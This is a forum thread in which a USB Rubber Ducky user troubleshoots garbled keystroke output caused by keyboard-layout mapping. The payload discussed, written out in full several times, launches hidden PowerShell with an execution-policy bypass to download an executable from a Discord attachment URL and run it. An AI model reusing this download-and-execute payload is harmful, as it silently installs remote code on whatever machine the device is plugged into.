randomblueshark Posted January 9, 2021 Share Posted January 9, 2021 Hello im a newb to usb rubber ducky,I received mine 4 days ago for pen testing, and I have a small problem with the STRING code. Here the code bellow I used. DELAY 200 CONTROL ESCAPE DELAY 300 STRING run DELAY 100 ENTER DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/796873244677242910/calc.exe',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\"" ENTER When executed in a notepad.exe ,I get this code with alot of @ and # powershell -NoP -NonI -W Hidden -Exec Bypass @IEX (New-Object System.Net.WebClient).DownloadFile(<https:##cdn.discordapp.com#attachments#777729234181029919#796873244677242910#calc.exe<,@$env:tempbob.exe@); Start-Process @$env:tempbob.exe@@ What im doing wrong? can someone help Quote Link to comment Share on other sites More sharing options...
chrizree Posted January 9, 2021 Share Posted January 9, 2021 It seems as if you need to specify a keyboard language when creating the payload/inject.bin - is the "victim" anything else than US keyb layout? Quote Link to comment Share on other sites More sharing options...
chrizree Posted January 10, 2021 Share Posted January 10, 2021 What method are you using to create the inject.bin file? Quote Link to comment Share on other sites More sharing options...
randomblueshark Posted January 10, 2021 Author Share Posted January 10, 2021 (edited) I own corsair k70 keyboard Everything look good using the ca-fr.json on https://shop.hak5.org/pages/ducky-encoder except one thing the usb rubber ducky does not recognize this key ---> " the ducky remplace it for this key --->\ powershell -NoP -NonI -W Hidden -Exec Bypass \IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\\$env:temp\12345.exe\\); Start-Process \\$env:temp\12345.exe\\\ after the execution that the code missing alots of " Ducky must click on Shift and this one surronded in red ,but click on shift + \ the left key beside 1 key Orignal code STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\"$env:temp\12345.exe\"); Start-Process \"$env:temp\12345.exe\"" Edited January 10, 2021 by myapple851 Quote Link to comment Share on other sites More sharing options...
chrizree Posted January 10, 2021 Share Posted January 10, 2021 (edited) So, even if something is still not correct, something has changed between your first an last post; @ has become \, what did you change? Forward slashes / also seems to have been changed to now be correct (was previously the # char in the first post), also < seems to be correct as it's ' in the latest example of your output. Also not sure what keyboard layout you have in the screenshot of your On-Screen Keyboard. I configured one of my Windows 10 boxes for Canadian French and Canadian-French (Legacy) and none of them showed the mapping you have captured in your screen shot. Your physical keyboard doesn't matter, btw. I used the chars that gives you problems with other keyboard layouts and I have no problems running my payloads that contains those chars. Perhaps the ca-fr.json language map file isn't all correct? Edited January 10, 2021 by chrizree Quote Link to comment Share on other sites More sharing options...
randomblueshark Posted January 10, 2021 Author Share Posted January 10, 2021 (edited) Ok I figured that out why its doing that, my keyboard is us ...now its working ,the code work on my main os system. thanks for help anyway Edited January 11, 2021 by myapple851 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.